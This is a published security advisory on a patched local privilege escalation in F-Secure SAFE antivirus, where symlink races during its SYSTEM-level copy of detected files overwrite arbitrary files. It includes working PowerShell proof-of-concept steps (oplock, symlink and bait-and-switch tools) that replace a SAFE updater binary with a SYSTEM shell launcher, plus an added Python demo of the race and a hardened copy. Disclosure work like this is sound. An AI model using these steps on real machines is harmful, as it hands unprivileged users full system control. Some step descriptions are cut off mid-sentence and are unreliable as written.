Product: F-Secure SAFE Antivirus (also affected CS and PSB Computer Protection)
Type: Local Privilege Escalation
Summary: A privileged file copy performed by SAFE when an infected file is detected can be abused to overwrite an arbitrary file. This can be used by an unprivileged user to obtain SYSTEM privileges on the local machine.
This vulnerability is patched, and the update should have been automatically deployed to clients.
When an infected file is detected, SAFE will attempt to delete it. The first attempt will impersonate the unprivileged user account; if the file is not removed it will retry without impersonation, and make a temporary copy of the file. These operations will be performed by a privileged process running as SYSTEM (
The operations performed (those relevant to this vulnerability) can be summarized as follows:
infected_file.exe properties (and its parent directories'), impersonating user (no more impersonation from this point forward)
C:\ProgramData\F-Secure\Log\FSAV\Users\removal.log (or path in
infected_file.exe content & properties
infected_file.exe content & properties
infected_file.exe.uss_dis in the same directory
infected_file.exe.uss_dis content & properties
A general explanation on privileged file operation bugs is available here.
This behavior can be abused by an unprivileged user to create, overwrite or delete arbitrary files with
SYSTEM privileges. Indeed, the user can replace the files (infected and copy) by pseudo-symbolic links to arbitrary files just before the copy operation (after step 6, before step 7) so that the copy operation overwrites an arbitrary file – and then change the link before the delete operation (step 9) to prevent removal.
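The root cause described above is a time-of-check/time-of-use gap in a privileged file copy: the service checks and then copies by path, so a link planted between the two steps redirects both the read and the write. The following is an added example written for this advisory, not code from the advisory author or from F-Secure. It reproduces the bug class on a POSIX system in Python and shows the hardened pattern beside it: open the source without following links (O_NOFOLLOW), verify on the open handle (fstat) that it is a regular file, and create the destination with O_CREAT|O_EXCL|O_NOFOLLOW so a planted link at either end is refused. The Windows counterpart, which this example does not implement, is opening with FILE_FLAG_OPEN_REPARSE_POINT and checking the handle's attributes with GetFileInformationByHandle before using that same handle for the copy. All file names (attacker_source.txt, protected_target.txt, infected.txt) are constructed for the demonstration.

```python
import os
import shutil
import stat
import tempfile


def vulnerable_copy(src: str, dst: str) -> None:
    """Path-based copy: a check on the path, then a copy by path.

    If src or dst is swapped for a symbolic link between the check and the
    copy, the copy reads from / writes to the link target instead. This is
    the pattern the advisory describes for the privileged temporary copy.
    """
    if not os.path.exists(src):
        raise FileNotFoundError(src)
    shutil.copyfile(src, dst)  # follows links on both src and dst


def hardened_copy(src: str, dst: str) -> None:
    """Handle-based copy that refuses links at either end.

    O_NOFOLLOW makes open() fail (ELOOP) if src is a symlink; fstat on the
    opened handle confirms it is a regular file; O_CREAT|O_EXCL|O_NOFOLLOW
    on dst fails (EEXIST) if anything, including a link, already sits there.
    All data then moves through the verified handles, never through paths.
    """
    fd_src = os.open(src, os.O_RDONLY | os.O_NOFOLLOW)
    try:
        st = os.fstat(fd_src)
        if not stat.S_ISREG(st.st_mode):
            raise PermissionError(f"refusing to copy non-regular file: {src}")
        fd_dst = os.open(dst, os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW, 0o600)
        try:
            with os.fdopen(fd_src, "rb", closefd=False) as fsrc, \
                 os.fdopen(fd_dst, "wb", closefd=False) as fdst:
                shutil.copyfileobj(fsrc, fdst)
        finally:
            os.close(fd_dst)
    finally:
        os.close(fd_src)


def demo() -> dict:
    """Constructed scenario mirroring the advisory: the 'infected' file and
    its temporary copy are both replaced by links just before the copy."""
    root = tempfile.mkdtemp()
    try:
        attacker_source = os.path.join(root, "attacker_source.txt")
        protected_target = os.path.join(root, "protected_target.txt")
        with open(attacker_source, "w") as f:
            f.write("attacker content")
        with open(protected_target, "w") as f:
            f.write("original")

        infected = os.path.join(root, "infected.txt")   # what the scanner flagged
        temp_copy = infected + ".tmp"                   # where the service copies it
        os.symlink(attacker_source, infected)           # read end redirected
        os.symlink(protected_target, temp_copy)         # write end redirected

        # Path-based copy: the protected file is overwritten.
        vulnerable_copy(infected, temp_copy)
        with open(protected_target) as f:
            after_vulnerable = f.read()

        # Reset the target and retry with the handle-based copy.
        with open(protected_target, "w") as f:
            f.write("original")
        try:
            hardened_copy(infected, temp_copy)
            hardened_refused = False
        except OSError:
            hardened_refused = True
        with open(protected_target) as f:
            after_hardened = f.read()

        return {
            "vulnerable_overwrote_target": after_vulnerable == "attacker content",
            "hardened_refused": hardened_refused,
            "target_intact_after_hardened": after_hardened == "original",
        }
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    print(demo())
```

The other fix the advisory's own description points at is to keep impersonating the requesting user for the retry and the temporary copy: an operation performed with the user's token cannot write to a location the user could not already write to, so the redirection buys nothing.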
As an example, to overwrite C:\Path\target.exe with the content of C:\Path2\source.exe, an unprivileged user can:
removal.log to be created
removal.log to let other operations take place up to step 6 and block the thread
C:\Windows\Temp\Test\eicar.txt by a symlink to
eicar.txt.uss_dis, which actually means
source.exe is copied to
C:\Windows\Temp\Test\eicar.txt.uss_dis to resolve to a non-existent file
eicar.txt.uss_dis, deletion fails
target.exe is overwritten with the content of
The following PowerShell code (and tools from the symboliclink-testing-tools toolkit) can be used to perform the above.
You’ll need 2 PowerShell consoles. On the first console, enter:
PS C:\> New-Item -Type Directory -Force C:\Windows\Temp\Test
PS C:\> 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*' | Out-File -encoding ascii -FilePath C:\Windows\Temp\Test\eicar.txt -NoNewline
PS C:\> Sleep 5
PS C:\> path\to\SetOpLock.exe C:\ProgramData\F-Secure\Log\FSAV\Users\removal.log
Wait for the Oplock to trigger (1-2 minutes in my tests), then on the second console, enter:
PS C:\> Remove-Item -Recurse -Force C:\Windows\Temp\Test
PS C:\> path\to\CreateSymlink.exe -p C:\Windows\Temp\Test\eicar.txt path\to\GetSystemShell.exe
PS C:\> path\to\BaitAndSwitch.exe C:\Windows\Temp\Test\eicar.txt.uss_dis "C:\Program Files (x86)\F-Secure\SAFE\apps\Ultralight\ulu\1527152256\ulu_handler.exe" C:\Windows\Temp\dummy.txt
The following video shows this PoC used to replace a SAFE updater binary C:\Program Files (x86)\F-Secure\SAFE\apps\Ultralight\ulu\1527152256\ulu_handler.exe with a program that pops up a
The vendor has released a patch through update channels that should have been deployed automatically on affected systems.
No CVE or vendor advisory was issued.
2018-07-10: Initial report sent to vendor
2018-07-11: Vendor acknowledges receipt of the report
2018-07-30: Vendor confirms a fix is in progress
2018-07-30: Information request sent to vendor regarding other impacted products
2018-07-30: Vendor acknowledges the request
2018-08-07: Vendor releases updates through auto-update channels
2018-08-09: Vendor response confirming the fix and the other impacted products, asking for test of the fix
2018-08-09: Mail sent to vendor confirming the fix
2018-08-21: Mail from vendor informing that the bug has been granted a reward through their VRP
2019-03-20: Publication of this advisory